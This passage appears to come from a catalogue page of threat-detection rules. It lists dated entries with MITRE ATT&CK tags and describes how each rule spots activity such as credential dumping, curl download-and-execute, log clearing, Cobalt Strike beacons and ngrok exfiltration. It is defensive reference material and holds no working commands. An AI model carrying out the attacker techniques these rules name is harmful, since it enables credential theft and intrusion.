Detects when a program changes the default file association of any extension to an executable. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.

Read More
Change Default File Association Via Assoc

Aug 12, 2024 · attack.persistence attack.t1546.001 ·
Share on:

Detects file association changes using the builtin "assoc" command. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.

Read More
Change PowerShell Policies to an Insecure Level

Aug 12, 2024 · attack.execution attack.t1059.001 ·
Share on:

Detects changing the PowerShell script execution policy to a potentially insecure level using the "-ExecutionPolicy" flag.

Read More
Change PowerShell Policies to an Insecure Level - PowerShell

Aug 12, 2024 · attack.execution attack.t1059.001 ·
Share on:

Detects changing the PowerShell script execution policy to a potentially insecure level using the "Set-ExecutionPolicy" cmdlet.

Read More
Change the Fax Dll

Aug 12, 2024 · attack.defense-evasion attack.t1112 ·
Share on:

Detect possible persistence using Fax DLL load when service restart

Read More
Change to Authentication Method

Aug 12, 2024 · attack.credential-access attack.t1556 attack.persistence attack.defense-evasion attack.t1098 ·
Share on:

Change to authentication method could be an indicator of an attacker adding an auth method to the account so they can have continued access.

Read More
Change User Account Associated with the FAX Service

Aug 12, 2024 · attack.defense-evasion attack.t1112 ·
Share on:

Detect change of the user account associated with the FAX service to avoid the escalation problem.

Read More
Change User Agents with WebRequest

Aug 12, 2024 · attack.command-and-control attack.t1071.001 ·
Share on:

Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.

Read More
Changes to Device Registration Policy

Aug 12, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1484 ·
Share on:

Monitor and alert for changes to the device registration policy.

Read More
Changes To PIM Settings

Aug 12, 2024 · attack.privilege-escalation attack.persistence attack.t1078.004 ·
Share on:

Detects when changes are made to PIM roles

Read More
Changing Existing Service ImagePath Value Via Reg.EXE

Aug 12, 2024 · attack.persistence attack.t1574.011 ·
Share on:

Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services

Read More
Chmod Suspicious Directory

Aug 12, 2024 · attack.defense-evasion attack.t1222.002 ·
Share on:

Detects chmod targeting files in abnormal directory paths.

Read More
Chopper Webshell Process Pattern

Aug 12, 2024 · attack.persistence attack.t1505.003 attack.t1018 attack.t1033 attack.t1087 ·
Share on:

Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells

Read More
Chromium Browser Headless Execution To Mockbin Like Site

Aug 12, 2024 · attack.execution ·
Share on:

Detects the execution of a Chromium based browser process with the "headless" flag and a URL pointing to the mockbin.org service (which can be used to exfiltrate data).

Read More
Cisco ASA FTD Exploit CVE-2020-3452

Aug 12, 2024 · attack.t1190 attack.initial-access cve.2020-3452 detection.emerging-threats ·
Share on:

Detects exploitation attempts on Cisco ASA FTD systems exploiting CVE-2020-3452 with a status code of 200 (sccessful exploitation)

Read More
Cisco BGP Authentication Failures

Aug 12, 2024 · attack.initial-access attack.persistence attack.privilege-escalation attack.defense-evasion attack.credential-access attack.collection attack.t1078 attack.t1110 attack.t1557 ·
Share on:

Detects BGP failures which may be indicative of brute force attacks to manipulate routing

Read More
Cisco Clear Logs

Aug 12, 2024 · attack.defense-evasion attack.t1070.003 ·
Share on:

Clear command history in network OS which is used for defense evasion

Read More
Cisco Collect Data

Aug 12, 2024 · attack.discovery attack.credential-access attack.collection attack.t1087.001 attack.t1552.001 attack.t1005 ·
Share on:

Collect pertinent data from the configuration files

Read More
Cisco Crypto Commands

Aug 12, 2024 · attack.credential-access attack.defense-evasion attack.t1553.004 attack.t1552.004 ·
Share on:

Show when private keys are being exported from the device, or when new certificates are installed

Read More
Cisco Denial of Service

Aug 12, 2024 · attack.impact attack.t1495 attack.t1529 attack.t1565.001 ·
Share on:

Detect a system being shutdown or put into different boot mode

Read More
Cisco Disabling Logging

Aug 12, 2024 · attack.defense-evasion attack.t1562.001 ·
Share on:

Turn off logging locally or remote

Read More
Cisco Discovery

Aug 12, 2024 · attack.discovery attack.t1083 attack.t1201 attack.t1057 attack.t1018 attack.t1082 attack.t1016 attack.t1049 attack.t1033 attack.t1124 ·
Share on:

Find information about network devices that is not stored in config files

Read More
Cisco File Deletion

Aug 12, 2024 · attack.defense-evasion attack.impact attack.t1070.004 attack.t1561.001 attack.t1561.002 ·
Share on:

See what files are being deleted from flash file systems

Read More
Cisco LDP Authentication Failures

Aug 12, 2024 · attack.initial-access attack.persistence attack.privilege-escalation attack.defense-evasion attack.credential-access attack.collection attack.t1078 attack.t1110 attack.t1557 ·
Share on:

Detects LDP failures which may be indicative of brute force attacks to manipulate MPLS labels

Read More
Cisco Local Accounts

Aug 12, 2024 · attack.persistence attack.t1136.001 attack.t1098 ·
Share on:

Find local accounts being created or modified as well as remote authentication configurations

Read More
Cisco Modify Configuration

Aug 12, 2024 · attack.persistence attack.impact attack.t1490 attack.t1505 attack.t1565.002 attack.t1053 ·
Share on:

Modifications to a config that will serve an adversary's impacts or persistence

Read More
Cisco Show Commands Input

Aug 12, 2024 · attack.credential-access attack.t1552.003 ·
Share on:

See what commands are being input into the device by other people, full credentials can be in the history

Read More
Cisco Sniffing

Aug 12, 2024 · attack.credential-access attack.discovery attack.t1040 ·
Share on:

Show when a monitor or a span/rspan is setup or modified

Read More
Cisco Stage Data

Aug 12, 2024 · attack.collection attack.lateral-movement attack.command-and-control attack.exfiltration attack.t1074 attack.t1105 attack.t1560.001 ·
Share on:

Various protocols maybe used to put data on the device for exfil or infil

Read More
Citrix ADS Exploitation CVE-2020-8193 CVE-2020-8195

Aug 12, 2024 · attack.initial-access attack.t1190 cve.2020-8193 cve.2020-8195 detection.emerging-threats ·
Share on:

Detects exploitation attempt against Citrix Netscaler, Application Delivery Controller (ADS) and Citrix Gateway exploiting vulnerabilities reported as CVE-2020-8193 and CVE-2020-8195

Read More
Citrix Netscaler Attack CVE-2019-19781

Aug 12, 2024 · attack.initial-access attack.t1190 cve.2019-19781 detection.emerging-threats ·
Share on:

Detects CVE-2019-19781 exploitation attempt against Citrix Netscaler, Application Delivery Controller and Citrix Gateway Attack

Read More
Classes Autorun Keys Modification

Aug 12, 2024 · attack.persistence attack.t1547.001 ·
Share on:

Detects modification of autostart extensibility point (ASEP) in registry.

Read More
Clear Linux Logs

Aug 12, 2024 · attack.defense-evasion attack.t1070.002 ·
Share on:

Detects attempts to clear logs on the system. Adversaries may clear system logs to hide evidence of an intrusion

Read More
Clearing Windows Console History

Aug 12, 2024 · attack.defense-evasion attack.t1070 attack.t1070.003 ·
Share on:

Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.

Read More
Cleartext Protocol Usage

Aug 12, 2024 · attack.credential-access ·
Share on:

Ensure that all account usernames and authentication credentials are transmitted across networks using encrypted channels. Ensure that an encryption is used for all sensitive information in transit. Ensure that an encrypted channels is used for all administrative account access.

Read More
Cleartext Protocol Usage Via Netflow

Aug 12, 2024 · attack.credential-access ·
Share on:

Ensure that all account usernames and authentication credentials are transmitted across networks using encrypted channels Ensure that an encryption is used for all sensitive information in transit. Ensure that an encrypted channels is used for all administrative account access.

Read More
ClickOnce Trust Prompt Tampering

Aug 12, 2024 · attack.defense-evasion attack.t1112 ·
Share on:

Detects changes to the ClickOnce trust prompt registry key in order to enable an installation from different locations such as the Internet.

Read More
Clipboard Collection of Image Data with Xclip Tool

Aug 12, 2024 · attack.collection attack.t1115 ·
Share on:

Detects attempts to collect image data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed. Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.

Read More
Clipboard Collection with Xclip Tool

Aug 12, 2024 · attack.collection attack.t1115 ·
Share on:

Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed. Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.

Read More
Clipboard Collection with Xclip Tool - Auditd

Aug 12, 2024 · attack.collection attack.t1115 ·
Share on:

Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed. Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.

Read More
Clipboard Data Collection Via OSAScript

Aug 12, 2024 · attack.collection attack.execution attack.t1115 attack.t1059.002 ·
Share on:

Detects possible collection of data from the clipboard via execution of the osascript binary

Read More
CLR DLL Loaded Via Office Applications

Aug 12, 2024 · attack.execution attack.t1204.002 ·
Share on:

Detects CLR DLL being loaded by an Office Product

Read More
Cmd.EXE Missing Space Characters Execution Anomaly

Aug 12, 2024 · attack.execution attack.t1059.001 ·
Share on:

Detects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe. This could be a sign of obfuscation of a fat finger problem (typo by the developer).

Read More
CMSTP Execution Process Access

Aug 12, 2024 · attack.defense-evasion attack.t1218.003 attack.execution attack.t1559.001 attack.g0069 attack.g0080 car.2019-04-001 ·
Share on:

Detects various indicators of Microsoft Connection Manager Profile Installer execution

Read More
CMSTP Execution Process Creation

Aug 12, 2024 · attack.defense-evasion attack.execution attack.t1218.003 attack.g0069 car.2019-04-001 ·
Share on:

Detects various indicators of Microsoft Connection Manager Profile Installer execution

Read More
CMSTP Execution Registry Event

Aug 12, 2024 · attack.defense-evasion attack.execution attack.t1218.003 attack.g0069 car.2019-04-001 ·
Share on:

Detects various indicators of Microsoft Connection Manager Profile Installer execution

Read More
Cobalt Strike DNS Beaconing

Aug 12, 2024 · attack.command-and-control attack.t1071.004 ·
Share on:

Detects suspicious DNS queries known from Cobalt Strike beacons

Read More
CobaltStrike Load by Rundll32

Aug 12, 2024 · attack.defense-evasion attack.t1218.011 ·
Share on:

Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.

Read More
CobaltStrike Named Pipe

Aug 12, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1055 ·
Share on:

Detects the creation of a named pipe as used by CobaltStrike

Read More
CobaltStrike Named Pipe Pattern Regex

Aug 12, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1055 ·
Share on:

Detects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles

Read More
CobaltStrike Named Pipe Patterns

Aug 12, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1055 stp.1k ·
Share on:

Detects the creation of a named pipe with a pattern found in CobaltStrike malleable C2 profiles

Read More
CobaltStrike Service Installations - Security

Aug 12, 2024 · attack.execution attack.privilege-escalation attack.lateral-movement attack.t1021.002 attack.t1543.003 attack.t1569.002 ·
Share on:

Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement

Read More
CobaltStrike Service Installations - System

Aug 12, 2024 · attack.execution attack.privilege-escalation attack.lateral-movement attack.t1021.002 attack.t1543.003 attack.t1569.002 ·
Share on:

Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement

Read More
Code Executed Via Office Add-in XLL File

Aug 12, 2024 · attack.persistence attack.t1137.006 ·
Share on:

Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system. Office add-ins can be used to add functionality to Office programs

Read More
Code Execution via Pcwutl.dll

Aug 12, 2024 · attack.defense-evasion attack.t1218.011 ·
Share on:

Detects launch of executable by calling the LaunchApplication function from pcwutl.dll library.

Read More
Code Injection by ld.so Preload

Aug 12, 2024 · attack.persistence attack.privilege-escalation attack.t1574.006 ·
Share on:

Detects the ld.so preload persistence file. See man ld.so for more information.

Read More
CodeIntegrity - Blocked Driver Load With Revoked Certificate

Aug 12, 2024 · attack.privilege-escalation attack.t1543 ·
Share on:

Detects blocked load attempts of revoked drivers

Read More
CodeIntegrity - Blocked Image Load With Revoked Certificate

Aug 12, 2024 · attack.privilege-escalation ·
Share on:

Detects blocked image load events with revoked certificates by code integrity.

Read More
CodeIntegrity - Blocked Image/Driver Load For Policy Violation

Aug 12, 2024 · attack.privilege-escalation attack.t1543 ·
Share on:

Detects blocked load events that did not meet the authenticode signing level requirements or violated the code integrity policy.

Read More
CodeIntegrity - Disallowed File For Protected Processes Has Been Blocked

Aug 12, 2024 · attack.privilege-escalation ·
Share on:

Detects block events for files that are disallowed by code integrity for protected processes

Read More
CodeIntegrity - Revoked Image Loaded

Aug 12, 2024 · attack.privilege-escalation ·
Share on:

Detects image load events with revoked certificates by code integrity.

Read More
CodeIntegrity - Revoked Kernel Driver Loaded

Aug 12, 2024 · attack.privilege-escalation ·
Share on:

Detects the load of a revoked kernel driver

Read More
CodeIntegrity - Unmet WHQL Requirements For Loaded Kernel Module

Aug 12, 2024 · attack.privilege-escalation ·
Share on:

Detects loaded kernel modules that did not meet the WHQL signing requirements.

Read More
CodeIntegrity - Unsigned Image Loaded

Aug 12, 2024 · attack.privilege-escalation ·
Share on:

Detects loaded unsigned image on the system

Read More
CodeIntegrity - Unsigned Kernel Module Loaded

Aug 12, 2024 · attack.privilege-escalation ·
Share on:

Detects the presence of a loaded unsigned kernel module on the system.

Read More
COLDSTEEL Persistence Service Creation

Aug 12, 2024 · attack.defense-evasion attack.persistence detection.emerging-threats ·
Share on:

Detects the creation of new services potentially related to COLDSTEEL RAT

Read More
COLDSTEEL RAT Anonymous User Process Execution

Aug 12, 2024 · attack.persistence attack.defense-evasion detection.emerging-threats ·
Share on:

Detects the creation of a process executing as user called "ANONYMOUS" seen used by the "MileStone2016" variant of COLDSTEEL

Read More
COLDSTEEL RAT Cleanup Command Execution

Aug 12, 2024 · attack.persistence attack.defense-evasion detection.emerging-threats ·
Share on:

Detects the creation of a "rundll32" process from the ColdSteel persistence service to initiate the cleanup command by calling one of its own exports. This functionality is not present in "MileStone2017" and some "MileStone2016" samples

Read More
COLDSTEEL RAT Service Persistence Execution

Aug 12, 2024 · attack.persistence attack.defense-evasion detection.emerging-threats ·
Share on:

Detects the creation of an "svchost" process with specific command line flags, that were seen present and used by ColdSteel RAT

Read More
COM Hijack via Sdclt

Aug 12, 2024 · attack.privilege-escalation attack.t1546 attack.t1548 ·
Share on:

Detects changes to 'HKCU\Software\Classes\Folder\shell\open\command\DelegateExecute'

Read More
COM Hijacking via TreatAs

Aug 12, 2024 · attack.persistence attack.t1546.015 ·
Share on:

Detect modification of TreatAs key to enable "rundll32.exe -sta" command

Read More
Command Line Execution with Suspicious URL and AppData Strings

Aug 12, 2024 · attack.execution attack.command-and-control attack.t1059.003 attack.t1059.001 attack.t1105 ·
Share on:

Detects a suspicious command line execution that includes an URL and AppData string in the command line parameters as used by several droppers (js/vbs > powershell)

Read More
Commands to Clear or Remove the Syslog

Aug 12, 2024 · attack.defense-evasion attack.t1070.002 ·
Share on:

Detects specific commands commonly used to remove or empty the syslog. Which is often used by attacker as a method to hide their tracks

Read More
Commands to Clear or Remove the Syslog - Builtin

Aug 12, 2024 · attack.impact attack.t1565.001 ·
Share on:

Detects specific commands commonly used to remove or empty the syslog

Read More
Common Autorun Keys Modification

Aug 12, 2024 · attack.persistence attack.t1547.001 ·
Share on:

Detects modification of autostart extensibility point (ASEP) in registry.

Read More
Communication To LocaltoNet Tunneling Service Initiated

Aug 12, 2024 · attack.command-and-control attack.t1572 attack.t1090 attack.t1102 ·
Share on:

Detects an executable initiating a network connection to "LocaltoNet" tunneling sub-domains. LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet. Attackers have been seen to use this service for command-and-control activities to bypass MFA and perimeter controls.

Read More
Communication To LocaltoNet Tunneling Service Initiated - Linux

Aug 12, 2024 · attack.command-and-control attack.t1572 attack.t1090 attack.t1102 ·
Share on:

Detects an executable initiating a network connection to "LocaltoNet" tunneling sub-domains. LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet. Attackers have been seen to use this service for command-and-control activities to bypass MFA and perimeter controls.

Read More
Communication To Ngrok Tunneling Service - Linux

Aug 12, 2024 · attack.exfiltration attack.command-and-control attack.t1567 attack.t1568.002 attack.t1572 attack.t1090 attack.t1102 attack.s0508 ·
Share on:

Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors

Read More
Communication To Ngrok Tunneling Service Initiated

Aug 12, 2024 · attack.exfiltration attack.command-and-control attack.t1567 attack.t1568.002 attack.t1572 attack.t1090 attack.t1102 attack.s0508 ·
Share on:

Detects an executable initiating a network connection to "ngrok" tunneling domains. Attackers were seen using this "ngrok" in order to store their second stage payloads and malware. While communication with such domains can be legitimate, often times is a sign of either data exfiltration by malicious actors or additional download.

Read More
Communication To Uncommon Destination Ports

Aug 12, 2024 · attack.persistence attack.command-and-control attack.t1571 ·
Share on:

Detects programs that connect to uncommon destination ports

Read More
Compress Data and Lock With Password for Exfiltration With 7-ZIP

Aug 12, 2024 · attack.collection attack.t1560.001 ·
Share on:

An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities

Read More
Compress Data and Lock With Password for Exfiltration With WINZIP

Aug 12, 2024 · attack.collection attack.t1560.001 ·
Share on:

An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities

Read More
Computer Discovery And Export Via Get-ADComputer Cmdlet

Aug 12, 2024 · attack.discovery attack.t1033 ·
Share on:

Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file

Read More
Computer Discovery And Export Via Get-ADComputer Cmdlet - PowerShell

Aug 12, 2024 · attack.discovery attack.t1033 ·
Share on:

Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file

Read More
Computer Password Change Via Ksetup.EXE

Aug 12, 2024 · attack.execution ·
Share on:

Detects password change for the computer's domain account or host principal via "ksetup.exe"

Read More
Computer System Reconnaissance Via Wmic.EXE

Aug 12, 2024 · attack.discovery attack.execution attack.t1047 ·
Share on:

Detects execution of wmic utility with the "computersystem" flag in order to obtain information about the machine such as the domain, username, model, etc.

Read More
ComRAT Network Communication

Aug 12, 2024 · attack.defense-evasion attack.command-and-control attack.t1071.001 attack.g0010 ·
Share on:

Detects Turla ComRAT network communication.

Read More
Confluence Exploitation CVE-2019-3398

Aug 12, 2024 · attack.initial-access attack.t1190 cve.2019-3398 detection.emerging-threats ·
Share on:

Detects the exploitation of the Confluence vulnerability described in CVE-2019-3398

Read More
Conhost Spawned By Uncommon Parent Process

Aug 12, 2024 · attack.execution attack.t1059 ·
Share on:

Detects when the Console Window Host (conhost.exe) process is spawned by an uncommon parent process, which could be indicative of potential code injection activity.

Read More
Conhost.exe CommandLine Path Traversal

Aug 12, 2024 · attack.execution attack.t1059.003 ·
Share on:

detects the usage of path traversal in conhost.exe indicating possible command/argument confusion/hijacking

Read More
Connection Proxy

Aug 12, 2024 · attack.defense-evasion attack.t1090 ·
Share on:

Detects setting proxy configuration

Read More
Container Residence Discovery Via Proc Virtual FS

Aug 12, 2024 · attack.discovery attack.t1082 ·
Share on:

Detects potential container discovery via listing of certain kernel features in the "/proc" virtual filesystem

Read More
Conti NTDS Exfiltration Command

Aug 12, 2024 · attack.collection attack.t1560 detection.emerging-threats ·
Share on:

Detects a command used by conti to exfiltrate NTDS

Read More
Conti Volume Shadow Listing

Aug 12, 2024 · attack.t1587.001 attack.resource-development detection.emerging-threats ·
Share on:

Detects a command used by conti to find volume shadow backups

Read More
Control Panel Items

Aug 12, 2024 · attack.execution attack.defense-evasion attack.t1218.002 attack.persistence attack.t1546 ·
Share on:

Detects the malicious use of a control panel item

Read More
ConvertTo-SecureString Cmdlet Usage Via CommandLine

Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001 ·
Share on:

Detects usage of the "ConvertTo-SecureString" cmdlet via the commandline. Which is fairly uncommon and could indicate potential suspicious activity

Read More
Copy .DMP/.DUMP Files From Remote Share Via Cmd.EXE

Aug 12, 2024 · attack.credential-access ·
Share on:

Detects usage of the copy builtin cmd command to copy files with the ".dmp"/".dump" extension from a remote share

Read More
Copy From Or To Admin Share Or Sysvol Folder

Aug 12, 2024 · attack.lateral-movement attack.collection attack.exfiltration attack.t1039 attack.t1048 attack.t1021.002 ·
Share on:

Detects a copy command or a copy utility execution to or from an Admin share or remote

Read More
Copy From VolumeShadowCopy Via Cmd.EXE

Aug 12, 2024 · attack.impact attack.t1490 ·
Share on:

Detects the execution of the builtin "copy" command that targets a shadow copy (sometimes used to copy registry hives that are in use)

Read More
Copy Passwd Or Shadow From TMP Path

Aug 12, 2024 · attack.credential-access attack.t1552.001 ·
Share on:

Detects when the file "passwd" or "shadow" is copied from tmp path

Read More
Copying Sensitive Files with Credential Data

Aug 12, 2024 · attack.credential-access attack.t1003.002 attack.t1003.003 car.2013-07-001 attack.s0404 ·
Share on:

Files with well-known filenames (sensitive files with credential data) copying

Read More
CosmicDuke Service Installation

Aug 12, 2024 · attack.persistence attack.t1543.003 attack.t1569.002 detection.emerging-threats ·
Share on:

Detects the installation of a service named "javamtsup" on the system. The CosmicDuke info stealer uses Windows services typically named "javamtsup" for persistence.

Read More
CrashControl CrashDump Disabled

Aug 12, 2024 · attack.t1564 attack.t1112 ·
Share on:

Detects disabling the CrashDump per registry (as used by HermeticWiper)

Read More
Create Volume Shadow Copy with Powershell

Aug 12, 2024 · attack.credential-access attack.t1003.003 ·
Share on:

Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information

Read More
Created Files by Microsoft Sync Center

Aug 12, 2024 · attack.t1055 attack.t1218 attack.execution attack.defense-evasion ·
Share on:

This rule detects suspicious files created by Microsoft Sync Center (mobsync)

Read More
CreateDump Process Dump

Aug 12, 2024 · attack.defense-evasion attack.t1036 attack.t1003.001 ·
Share on:

Detects uses of the createdump.exe LOLOBIN utility to dump process memory

Read More
Creation Exe for Service with Unquoted Path

Aug 12, 2024 · attack.persistence attack.t1547.009 ·
Share on:

Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.

Read More
Creation of a Diagcab

Aug 12, 2024 · attack.resource-development ·
Share on:

Detects the creation of diagcab file, which could be caused by some legitimate installer or is a sign of exploitation (review the filename and its location)

Read More
Creation of a Local Hidden User Account by Registry

Aug 12, 2024 · attack.persistence attack.t1136.001 ·
Share on:

Sysmon registry detection of a local hidden user account.

Read More
Creation Of A Local User Account

Aug 12, 2024 · attack.t1136.001 attack.persistence ·
Share on:

Detects the creation of a new user account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.

Read More
Creation Of a Suspicious ADS File Outside a Browser Download

Aug 12, 2024 · attack.defense-evasion ·
Share on:

Detects the creation of a suspicious ADS (Alternate Data Stream) file by software other than browsers

Read More
Creation Of An User Account

Aug 12, 2024 · attack.t1136.001 attack.persistence ·
Share on:

Detects the creation of a new user account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.

Read More
Creation Of Non-Existent System DLL

Aug 12, 2024 · attack.defense-evasion attack.persistence attack.privilege-escalation attack.t1574.001 attack.t1574.002 ·
Share on:

Detects the creation of system DLLs that are usually not present on the system (or at least not in system directories). Usually this technique is used to achieve DLL hijacking.

Read More
Cred Dump Tools Dropped Files

Aug 12, 2024 · attack.credential-access attack.t1003.001 attack.t1003.002 attack.t1003.003 attack.t1003.004 attack.t1003.005 ·
Share on:

Files with well-known filenames (parts of credential dump software or files produced by them) creation

Read More
Credential Dumping Activity By Python Based Tool

Aug 12, 2024 · attack.credential-access attack.t1003.001 attack.s0349 ·
Share on:

Detects LSASS process access for potential credential dumping by a Python-like tool such as LaZagne or Pypykatz.

Read More
Credential Dumping Attempt Via Svchost

Aug 12, 2024 · attack.t1548 ·
Share on:

Detects when a process tries to access the memory of svchost to potentially dump credentials.

Read More
Credential Dumping Attempt Via WerFault

Aug 12, 2024 · attack.credential-access attack.t1003.001 attack.s0002 ·
Share on:

Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.

Read More
Credential Dumping Tools Service Execution - Security

Aug 12, 2024 · attack.credential-access attack.execution attack.t1003.001 attack.t1003.002 attack.t1003.004 attack.t1003.005 attack.t1003.006 attack.t1569.002 attack.s0005 ·
Share on:

Detects well-known credential dumping tools execution via service execution events

Read More
Credential Dumping Tools Service Execution - System

Aug 12, 2024 · attack.credential-access attack.execution attack.t1003.001 attack.t1003.002 attack.t1003.004 attack.t1003.005 attack.t1003.006 attack.t1569.002 attack.s0005 ·
Share on:

Detects well-known credential dumping tools execution via service execution events

Read More
Credential Manager Access By Uncommon Applications

Aug 12, 2024 · attack.t1003 attack.credential-access ·
Share on:

Detects suspicious processes based on name and location that access the windows credential manager and vault. Which can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::cred" function

Read More
Credentials from Password Stores - Keychain

Aug 12, 2024 · attack.credential-access attack.t1555.001 ·
Share on:

Detects passwords dumps from Keychain

Read More
Credentials In Files

Aug 12, 2024 · attack.credential-access attack.t1552.001 ·
Share on:

Detecting attempts to extract passwords with grep and laZagne

Read More
Credentials In Files - Linux

Aug 12, 2024 · attack.credential-access attack.t1552.001 ·
Share on:

Detecting attempts to extract passwords with grep

Read More
CredUI.DLL Loaded By Uncommon Process

Aug 12, 2024 · attack.credential-access attack.collection attack.t1056.002 ·
Share on:

Detects loading of "credui.dll" and related DLLs by an uncommon process. Attackers might leverage this DLL for potential use of "CredUIPromptForCredentials" or "CredUnPackAuthenticationBufferW".

Read More
Critical Hive In Suspicious Location Access Bits Cleared

Aug 12, 2024 · attack.credential-access attack.t1003.002 ·
Share on:

Detects events from the Kernel-General ETW indicating that the access bits of a hive with a system like hive name located in the temp directory have been reset. This occurs when an application tries to access a hive and the hive has not be recognized since the last 7 days (by default). Registry hive dumping utilities such as QuarksPwDump were seen emitting this behavior.

Read More
Crontab Enumeration

Aug 12, 2024 · attack.discovery attack.t1007 ·
Share on:

Detects usage of crontab to list the tasks of the user

Read More
Cross Site Scripting Strings

Aug 12, 2024 · attack.initial-access attack.t1189 ·
Share on:

Detects XSS attempts injected via GET requests in access logs

Read More
Crypto Miner User Agent

Aug 12, 2024 · attack.command-and-control attack.t1071.001 ·
Share on:

Detects suspicious user agent strings used by crypto miners in proxy logs

Read More
Csc.EXE Execution Form Potentially Suspicious Parent

Aug 12, 2024 · attack.execution attack.t1059.005 attack.t1059.007 attack.defense-evasion attack.t1218.005 attack.t1027.004 ·
Share on:

Detects a potentially suspicious parent of "csc.exe", which could be a sign of payload delivery.

Read More
Cscript/Wscript Uncommon Script Extension Execution

Aug 12, 2024 · attack.execution attack.t1059.005 attack.t1059.007 ·
Share on:

Detects Wscript/Cscript executing a file with an uncommon (i.e. non-script) extension

Read More
CSExec Service File Creation

Aug 12, 2024 · attack.execution attack.t1569.002 attack.s0029 ·
Share on:

Detects default CSExec service filename which indicates CSExec service installation and execution

Read More
CSExec Service Installation

Aug 12, 2024 · attack.execution attack.t1569.002 ·
Share on:

Detects CSExec service installation and execution events

Read More
Curl Download And Execute Combination

Aug 12, 2024 · attack.defense-evasion attack.t1218 attack.command-and-control attack.t1105 ·
Share on:

Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.

Read More
Curl Usage on Linux

Aug 12, 2024 · attack.command-and-control attack.t1105 ·
Share on:

Detects a curl process start on linux, which indicates a file download from a remote location or a simple web request to a remote server

Read More
Curl Web Request With Potential Custom User-Agent

Aug 12, 2024 · attack.execution ·
Share on:

Detects execution of "curl.exe" with a potential custom "User-Agent". Attackers can leverage this to download or exfiltrate data via "curl" to a domain that only accept specific "User-Agent" strings

Read More
CurrentControlSet Autorun Keys Modification

Aug 12, 2024 · attack.persistence attack.t1547.001 ·
Share on:

Detects modification of autostart extensibility point (ASEP) in registry.

Read More
CurrentVersion Autorun Keys Modification

Aug 12, 2024 · attack.persistence attack.t1547.001 ·
Share on:

Detects modification of autostart extensibility point (ASEP) in registry.

Read More
CurrentVersion NT Autorun Keys Modification

Aug 12, 2024 · attack.persistence attack.t1547.001 ·
Share on:

Detects modification of autostart extensibility point (ASEP) in registry.

Read More
Custom File Open Handler Executes PowerShell

Aug 12, 2024 · attack.defense-evasion attack.t1202 ·
Share on:

Detects the abuse of custom file open handler, executing powershell

Read More
CVE-2010-5278 Exploitation Attempt

Aug 12, 2024 · attack.initial-access attack.t1190 cve.2010-5278 detection.emerging-threats ·
Share on:

MODx manager - Local File Inclusion:Directory traversal vulnerability in manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl, and possibly earlier, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key parameter.

Read More
CVE-2020-0688 Exchange Exploitation via Web Log

Aug 12, 2024 · attack.initial-access attack.t1190 cve.2020-0688 detection.emerging-threats ·
Share on:

Detects the exploitation of Microsoft Exchange vulnerability as described in CVE-2020-0688

Read More
CVE-2020-0688 Exploitation Attempt

Aug 12, 2024 · attack.initial-access attack.t1190 cve.2020-0688 detection.emerging-threats ·
Share on:

Detects CVE-2020-0688 Exploitation attempts

Read More
CVE-2020-0688 Exploitation via Eventlog

Aug 12, 2024 · attack.initial-access attack.t1190 cve.2020-0688 detection.emerging-threats ·
Share on:

Detects the exploitation of Microsoft Exchange vulnerability as described in CVE-2020-0688

Read More
CVE-2020-10148 SolarWinds Orion API Auth Bypass

Aug 12, 2024 · attack.initial-access attack.t1190 cve.2020-10148 detection.emerging-threats ·
Share on:

